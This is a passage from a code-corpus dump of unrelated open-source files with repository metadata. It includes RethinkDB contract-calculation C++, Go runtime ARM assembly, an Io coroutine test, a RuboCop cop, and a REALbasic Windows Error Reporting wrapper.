*acks_map.at(old_contract.primary->server).branch;
bool already_registered = true;
old_state.current_branches.visit(reg,
[&](const region_t &, const branch_id_t &cur_branch) {
already_registered &= (cur_branch == to_register);
});
if (!already_registered) {
auto res = register_current_branches_out->insert(
std::make_pair(reg, to_register));
guarantee(res.second);
/* Due to branch garbage collection on the executor,
the branch history in the contract_ack might be incomplete.
Usually this isn't a problem, because the executor is
only going to garbage collect branches when it is sure
that the current branches are already present in the Raft
state. In that case `copy_branch_history_for_branch()` is
not going to traverse to the GCed branches.
However this assumption no longer holds if the Raft state
has just been overwritten by an emergency repair operation.
Hence we ignore missing branches in the copy operation. */
bool ignore_missing_branches
= old_contract.after_emergency_repair;
copy_branch_history_for_branch(
to_register,
this_contract_acks->at(
old_contract.primary->server).branch_history,
old_state,
ignore_missing_branches,
add_branches_out);
registered_new_branch = make_optional(to_register);
}
}
/* Check to what extent we can confirm that the replicas are on
`current_branch`. We'll use this to determine when it's safe to GC and
whether we can switch off the `after_emergency_repair` flag (if it was
on). */
bool can_gc_branch_history = true, can_end_after_emergency_repair = true;
for (const server_id_t &server : new_contract.replicas) {
auto it = this_contract_acks->find(server);
if (it == this_contract_acks->end() || (
it->second.state !=
contract_ack_t::state_t::primary_ready &&
it->second.state !=
contract_ack_t::state_t::secondary_streaming)) {
/* At least one replica can't be confirmed to be on
`current_branch`, so we should keep the branch history around in
order to make it easy for that replica to rejoin later. */
can_gc_branch_history = false;
if (new_contract.voters.count(server) == 1 ||
(static_cast<bool>(new_contract.temp_voters) &&
new_contract.temp_voters->count(server) == 1)) {
/* If the `after_emergency_repair` flag is set to `true`, we
need to leave it set to `true` until we can confirm that
the branch history is intact. */
can_end_after_emergency_repair = false;
}
}
}
/* Branch history GC. The key decision is whether we should only keep
`current_branch`, or whether we need to keep all of its ancestors too. */
old_state.current_branches.visit(reg,
[&](const region_t &subregion, const branch_id_t ¤t_branch) {
if (!current_branch.is_nil()) {
if (can_gc_branch_history) {
remove_branches_out->erase(current_branch);
} else {
mark_all_ancestors_live(current_branch, subregion,
&old_state.branch_history, remove_branches_out);
}
}
});
if (can_end_after_emergency_repair) {
new_contract.after_emergency_repair = false;
}
new_contract_region_vector.push_back(reg);
new_contract_vector.push_back(new_contract);
});
}
}
/* Put the new contracts into a `region_map_t` to coalesce adjacent regions that have
identical contracts */
region_map_t<contract_t> new_contract_region_map =
region_map_t<contract_t>::from_unordered_fragments(
std::move(new_contract_region_vector), std::move(new_contract_vector));
/* Slice the new contracts by CPU shard and by user shard, so that no contract spans
more than one CPU shard or user shard. */
std::map<region_t, contract_t> new_contract_map;
for (size_t cpu = 0; cpu < CPU_SHARDING_FACTOR; ++cpu) {
region_t region = cpu_sharding_subspace(cpu);
for (size_t shard = 0; shard < old_state.config.config.shards.size(); ++shard) {
region.inner = old_state.config.shard_scheme.get_shard_range(shard);
new_contract_region_map.visit(region,
[&](const region_t ®, const contract_t &contract) {
guarantee(reg.beg == region.beg && reg.end == region.end);
new_contract_map.insert(std::make_pair(reg, contract));
});
}
}
/* Diff the new contracts against the old contracts */
for (const auto &cpair : old_state.contracts) {
auto it = new_contract_map.find(cpair.second.first);
if (it != new_contract_map.end() && it->second == cpair.second.second) {
/* The contract was unchanged. Remove it from `new_contract_map` to signal
that we don't need to assign it a new ID. */
new_contract_map.erase(it);
} else {
/* The contract was changed. So delete the old one. */
remove_contracts_out->insert(cpair.first);
}
}
for (const auto &pair : new_contract_map) {
/* The contracts remaining in `new_contract_map` are actually new; whatever
contracts used to cover their region have been deleted. So assign them contract
IDs and export them. */
add_contracts_out->insert(std::make_pair(generate_uuid(), pair));
}
}
| C++ | 5 | zadcha/rethinkdb | src/clustering/table_contract/coordinator/calculate_contracts.cc | [
"Apache-2.0"
] |
```{r echo=FALSE}
box::use(./a)
```
| RMarkdown | 2 | jimhester/box | tests/testthat/support/knitr/doc.rmd | [
"MIT"
] |
// Code generated by mkduff.go; DO NOT EDIT.
// Run go generate from src/runtime to update.
// See mkduff.go for comments.
#include "textflag.h"
TEXT runtime·duffzero(SB), NOSPLIT, $0-0
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
MOVW.P R0, 4(R1)
RET
TEXT runtime·duffcopy(SB), NOSPLIT, $0-0
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
MOVW.P 4(R1), R0
MOVW.P R0, 4(R2)
RET
| GAS | 2 | Havoc-OS/androidprebuilts_go_linux-x86 | src/runtime/duff_arm.s | [
"BSD-3-Clause"
] |
<zone Name="Title"><h1>Add/Edit Todo (Liquid)</h1></zone>
{{ Model | shape_render }}
| Liquid | 3 | SvanBoxel/OrchardCore | src/OrchardCore.Modules/OrchardCore.Demo/Views/Todo/Edit.liquid | [
"BSD-3-Clause"
] |
CoroTest := UnitTest clone do(
testRecentInChain := method(
o := Object clone
o s := Sequence clone
o l := method(
j := 1
loop(
s appendSeq("a", j asString, ".")
if(j%2==0, pause)
j = j + 1
)
)
run := method(
o @@l
for(i,1,4,
yield
o s appendSeq("b", i asString, ".")
if(i==2, o actorCoroutine recentInChain resumeLater)
)
)
run
assertEquals("a1.a2.b1.b2.a3.a4.b3.b4.", o s asString)
)
)
| Io | 3 | akluth/io | libs/iovm/tests/correctness/CoroTest.io | [
"BSD-3-Clause"
] |
(1 & 'Hello' & 2.0 & someObject) asVector
| Self | 0 | LaudateCorpus1/RosettaCodeData | Task/Arrays/Self/arrays-3.self | [
"Info-ZIP"
] |
const Err = error{Foo};
fn foo() u8 {
var x = @intCast(u8, 9);
return x;
}
pub fn main() !u8 {
if (foo() == 7) return Err.Foo;
return 123;
}
| Zig | 4 | aruniiird/zig | test/standalone/main_return_error/error_u8_non_zero.zig | [
"MIT"
] |
# frozen_string_literal: true
module RuboCop
module Cop
module RSpec
# Checks for a specified error in checking raised errors.
#
# Enforces one of an Exception type, a string, or a regular
# expression to match against the exception message as a parameter
# to `raise_error`
#
# @example
#
# # bad
# expect {
# raise StandardError.new('error')
# }.to raise_error
#
# # good
# expect {
# raise StandardError.new('error')
# }.to raise_error(StandardError)
#
# expect {
# raise StandardError.new('error')
# }.to raise_error('error')
#
# expect {
# raise StandardError.new('error')
# }.to raise_error(/err/)
#
# expect { do_something }.not_to raise_error
class UnspecifiedException < Base
MSG = 'Specify the exception being captured'
RESTRICT_ON_SEND = %i[to].freeze
# @!method empty_raise_error_or_exception(node)
def_node_matcher :empty_raise_error_or_exception, <<-PATTERN
(send
(block
(send nil? :expect) ...)
:to
(send nil? {:raise_error :raise_exception})
)
PATTERN
def on_send(node)
return unless empty_exception_matcher?(node)
add_offense(node.children.last)
end
def empty_exception_matcher?(node)
empty_raise_error_or_exception(node) && !block_with_args?(node.parent)
end
def block_with_args?(node)
return unless node&.block_type?
node.arguments?
end
end
end
end
end
| Ruby | 5 | ylht/brew | Library/Homebrew/vendor/bundle/ruby/2.6.0/gems/rubocop-rspec-2.4.0/lib/rubocop/cop/rspec/unspecified_exception.rb | [
"BSD-2-Clause"
] |
#tag Class
Protected Class ErrorReportWFS
#tag Method, Flags = &h0
Sub AddDump(type as Integer, flags as Integer)
#if TargetWin32
Soft Declare Sub WerReportAddDump Lib "Wer" ( handle as Integer, processHandle as Integer, threadHandle as Integer, _
type as Integer, exceptionInfo as Integer, customOptions as Integer, flags as Integer )
if System.IsFunctionAvailable( "WerReportAddDump", "Wer" ) and mHandle <> 0 then
// Get the process handle first
Declare Function GetModuleHandleW Lib "Kernel32" ( name as Integer ) as Integer
Dim processHandle as Integer = GetModuleHandleW( 0 )
// Now, if the dump type is 'micro', we need to have a valid
// thread handle as well.
Dim threadHandle as Integer = 0
if type = kDumpMicro then
Declare Function GetCurrentThread Lib "Kernel32" () as Integer
threadHandle = GetCurrentThread
end if
// Now we can add the dump
WerReportAddDump( mHandle, processHandle, threadHandle, type, 0, 0, flags )
end if
#else
#pragma unused type
#pragma unused flags
#endif
End Sub
#tag EndMethod
#tag Method, Flags = &h0
Sub AddFile(f as FolderItem, type as Integer, flags as Integer)
#if TargetWin32
Soft Declare Sub WerReportAddFile Lib "Wer" ( handle as Integer, path as WString, type as Integer, flags as Integer )
if System.IsFunctionAvailable( "WerReportAddFile", "Wer" ) and mHandle <> 0 then
WerReportAddFile( mHandle, f.AbsolutePath, type, flags )
end if
#else
#pragma unused f
#pragma unused type
#pragma unused flags
#endif
End Sub
#tag EndMethod
#tag Method, Flags = &h0
Sub Constructor(eventType as String, reportType as Integer)
#if TargetWin32
Soft Declare Sub WerReportCreate Lib "Wer" ( eventType as WString, reportType as Integer, reportInfo as Integer, ByRef handle as Integer )
if System.IsFunctionAvailable( "WerReportCreate", "Wer" ) then
WerReportCreate( eventType, reportType, 0, mHandle )
end if
#else
#pragma unused eventType
#pragma unused reportType
#endif
End Sub
#tag EndMethod
#tag Method, Flags = &h0
Sub Destructor()
#if TargetWin32
Soft Declare Sub WerReportCloseHandle Lib "Wer" ( handle as Integer )
if System.IsFunctionAvailable( "WerReportCloseHandle", "Wer" ) and mHandle <> 0 then
WerReportCloseHandle( mHandle )
end if
#endif
End Sub
#tag EndMethod
#tag Method, Flags = &h0
Shared Sub RegisterFile(f as FolderItem, type as Integer, flags as Integer)
#if TargetWin32
Soft Declare Sub WerRegisterFile Lib "Wer" ( path as WString, type as Integer, flags as Integer )
if System.IsFunctionAvailable( "WerRegisterFile", "Wer" ) then
WerRegisterFile( f.AbsolutePath, type, flags )
end if
#else
#pragma unused f
#pragma unused type
#pragma unused flags
#endif
End Sub
#tag EndMethod
#tag Method, Flags = &h0
Shared Sub RegisterMemoryBlock(mb as MemoryBlock)
#if TargetWin32
Soft Declare Sub WerRegisterMemoryBlock Lib "Wer" ( block as Ptr, size as Integer )
if System.IsFunctionAvailable( "WerRegisterMemoryBlock", "Wer" ) then
WerRegisterMemoryBlock( mb, mb.Size )
end if
#else
#pragma unused mb
#endif
End Sub
#tag EndMethod
#tag Method, Flags = &h0
Function Send(consent as Integer, flags as Integer) As Integer
#if TargetWin32
Soft Declare Sub WerReportSubmit Lib "Wer" ( handle as Integer, consent as Integer, flags as Integer, ByRef result as Integer )
if System.IsFunctionAvailable( "WerReportSubmit", "Wer" ) then
dim ret as Integer
if mHandle <> 0 then
WerReportSubmit( mHandle, consent, flags, ret )
return ret
end if
end if
#else
#pragma unused consent
#pragma unused flags
#endif
End Function
#tag EndMethod
#tag Method, Flags = &h21
Private Sub SetUIOptions(option as Integer, text as String)
#if TargetWin32
Soft Declare Sub WerReportSetUIOption Lib "Wer" ( handle as Integer, ui as Integer, customText as WString )
if System.IsFunctionAvailable( "WerReportSetUIOption", "Wer" ) and mHandle <> 0 then
WerReportSetUIOption( mHandle, option, text )
end if
#else
#pragma unused option
#pragma unused text
#endif
End Sub
#tag EndMethod
#tag ComputedProperty, Flags = &h0
#tag Getter
Get
return mAdditionalDataHeader
End Get
#tag EndGetter
#tag Setter
Set
mAdditionalDataHeader = value
Const WerUIAdditionalDataDlgHeader = 1
SetUIOptions( WerUIAdditionalDataDlgHeader, value )
End Set
#tag EndSetter
AdditionalDataHeader As String
#tag EndComputedProperty
#tag ComputedProperty, Flags = &h0
#tag Getter
Get
return mClosebody
End Get
#tag EndGetter
#tag Setter
Set
mClosebody = value
Const WerUICloseDlgBody = 9
SetUIOptions( WerUICloseDlgBody, value )
End Set
#tag EndSetter
CloseBody As String
#tag EndComputedProperty
#tag ComputedProperty, Flags = &h0
#tag Getter
Get
return mClosebuttoncaption
End Get
#tag EndGetter
#tag Setter
Set
mClosebuttoncaption = value
Const WerUICloseDlgButtonText = 10
SetUIOptions( WerUICloseDlgButtonText, value )
End Set
#tag EndSetter
CloseButtonCaption As String
#tag EndComputedProperty
#tag ComputedProperty, Flags = &h0
#tag Getter
Get
return mCloseheader
End Get
#tag EndGetter
#tag Setter
Set
mCloseheader = value
Const WerUICloseDlgHeader = 8
SetUIOptions( WerUICloseDlgHeader, value )
End Set
#tag EndSetter
CloseHeader As String
#tag EndComputedProperty
#tag ComputedProperty, Flags = &h0
#tag Getter
Get
return mClosetext
End Get
#tag EndGetter
#tag Setter
Set
mClosetext = value
Const WerUICloseText = 7
SetUIOptions( WerUICloseText, value )
End Set
#tag EndSetter
CloseText As String
#tag EndComputedProperty
#tag ComputedProperty, Flags = &h0
#tag Getter
Get
return mConsentbody
End Get
#tag EndGetter
#tag Setter
Set
mConsentbody = value
Const WerUIConsentDlgBody = 4
SetUIOptions( WerUIConsentDlgBody, value )
End Set
#tag EndSetter
ConsentBody As String
#tag EndComputedProperty
#tag ComputedProperty, Flags = &h0
#tag Getter
Get
return mConsentheader
End Get
#tag EndGetter
#tag Setter
Set
mConsentheader = value
Const WerUIConsentDlgHeader = 3
SetUIOptions( WerUIConsentDlgHeader, value )
End Set
#tag EndSetter
ConsentHeader As String
#tag EndComputedProperty
#tag Property, Flags = &h21
Private mAdditionalDataHeader As String
#tag EndProperty
#tag Property, Flags = &h21
Private mClosebody As String
#tag EndProperty
#tag Property, Flags = &h21
Private mClosebuttoncaption As String
#tag EndProperty
#tag Property, Flags = &h21
Private mCloseheader As String
#tag EndProperty
#tag Property, Flags = &h21
Private mClosetext As String
#tag EndProperty
#tag Property, Flags = &h21
Private mConsentbody As String
#tag EndProperty
#tag Property, Flags = &h21
Private mConsentHeader As String
#tag EndProperty
#tag Property, Flags = &h1
Protected mHandle As Integer
#tag EndProperty
#tag Property, Flags = &h21
Private mOfflinesolutionchecktext As String
#tag EndProperty
#tag Property, Flags = &h21
Private mOnlinesolutionchecktext As String
#tag EndProperty
#tag ComputedProperty, Flags = &h0
#tag Getter
Get
return mOfflinesolutionchecktext
End Get
#tag EndGetter
#tag Setter
Set
mOfflinesolutionchecktext = value
Const WerUIOnlineSolutionCheckText = 6
SetUIOptions( WerUIOnlineSolutionCheckText, value )
End Set
#tag EndSetter
OfflineSolutionCheckText As String
#tag EndComputedProperty
#tag ComputedProperty, Flags = &h0
#tag Getter
Get
return mOnlinesolutionchecktext
End Get
#tag EndGetter
#tag Setter
Set
mOnlinesolutionchecktext = value
Const WerUIOnlineSolutionCheckText = 5
SetUIOptions( WerUIOnlineSolutionCheckText, value )
End Set
#tag EndSetter
OnlineSolutionCheckText As String
#tag EndComputedProperty
#tag Constant, Name = kAddFileTypeHeapdump, Type = Double, Dynamic = False, Default = \"3", Scope = Public
#tag EndConstant
#tag Constant, Name = kAddFileTypeMicrodump, Type = Double, Dynamic = False, Default = \"1", Scope = Public
#tag EndConstant
#tag Constant, Name = kAddFileTypeMinidump, Type = Double, Dynamic = False, Default = \"2", Scope = Public
#tag EndConstant
#tag Constant, Name = kAddFileTypeOther, Type = Double, Dynamic = False, Default = \"5", Scope = Public
#tag EndConstant
#tag Constant, Name = kAddFileTypeUserDocument, Type = Double, Dynamic = False, Default = \"4", Scope = Public
#tag EndConstant
#tag Constant, Name = kConsentApproved, Type = Double, Dynamic = False, Default = \"2", Scope = Public
#tag EndConstant
#tag Constant, Name = kConsentDenied, Type = Double, Dynamic = False, Default = \"3", Scope = Public
#tag EndConstant
#tag Constant, Name = kConsentNotAsked, Type = Double, Dynamic = False, Default = \"1", Scope = Public
#tag EndConstant
#tag Constant, Name = kDumpHeap, Type = Double, Dynamic = False, Default = \"3", Scope = Public
#tag EndConstant
#tag Constant, Name = kDumpMicro, Type = Double, Dynamic = False, Default = \"1", Scope = Public
#tag EndConstant
#tag Constant, Name = kDumpMini, Type = Double, Dynamic = False, Default = \"2", Scope = Public
#tag EndConstant
#tag Constant, Name = kRegisterFileTypeOther, Type = Double, Dynamic = False, Default = \"2", Scope = Public
#tag EndConstant
#tag Constant, Name = kRegisterFileTypeUserDocument, Type = Double, Dynamic = False, Default = \"1", Scope = Public
#tag EndConstant
#tag Constant, Name = kReportFlagHonorAppRecovery, Type = Double, Dynamic = False, Default = \"1", Scope = Public
#tag EndConstant
#tag Constant, Name = kReportFlagHonorAppRestart, Type = Double, Dynamic = False, Default = \"2", Scope = Public
#tag EndConstant
#tag Constant, Name = kReportFlagNoArchive, Type = Double, Dynamic = False, Default = \"256", Scope = Public
#tag EndConstant
#tag Constant, Name = kReportFlagNoCloseUI, Type = Double, Dynamic = False, Default = \"64", Scope = Public
#tag EndConstant
#tag Constant, Name = kReportFlagNoQueue, Type = Double, Dynamic = False, Default = \"128", Scope = Public
#tag EndConstant
#tag Constant, Name = kReportFlagOutOfProcess, Type = Double, Dynamic = False, Default = \"32", Scope = Public
#tag EndConstant
#tag Constant, Name = kReportFlagOutOfProcessAsync, Type = Double, Dynamic = False, Default = \"1024", Scope = Public
#tag EndConstant
#tag Constant, Name = kReportFlagQueue, Type = Double, Dynamic = False, Default = \"4", Scope = Public
#tag EndConstant
#tag Constant, Name = kReportFlagShowDebug, Type = Double, Dynamic = False, Default = \"8", Scope = Public
#tag EndConstant
#tag Constant, Name = kReportFlagStartMinimized, Type = Double, Dynamic = False, Default = \"512", Scope = Public
#tag EndConstant
#tag Constant, Name = kReportTypeAddRegisteredData, Type = Double, Dynamic = False, Default = \"16", Scope = Public
#tag EndConstant
#tag Constant, Name = kReportTypeApplicationCrash, Type = Double, Dynamic = False, Default = \"2", Scope = Public
#tag EndConstant
#tag Constant, Name = kReportTypeApplicationHang, Type = Double, Dynamic = False, Default = \"3", Scope = Public
#tag EndConstant
#tag Constant, Name = kReportTypeCritical, Type = Double, Dynamic = False, Default = \"1", Scope = Public
#tag EndConstant
#tag Constant, Name = kReportTypeKernel, Type = Double, Dynamic = False, Default = \"4", Scope = Public
#tag EndConstant
#tag Constant, Name = kReportTypeNonCritical, Type = Double, Dynamic = False, Default = \"0", Scope = Public
#tag EndConstant
#tag Constant, Name = kSubmitReportAsync, Type = Double, Dynamic = False, Default = \"8", Scope = Public
#tag EndConstant
#tag Constant, Name = kSubmitReportDisabledQueue, Type = Double, Dynamic = False, Default = \"7", Scope = Public
#tag EndConstant
#tag Constant, Name = kSubmitResultDebug, Type = Double, Dynamic = False, Default = \"3", Scope = Public
#tag EndConstant
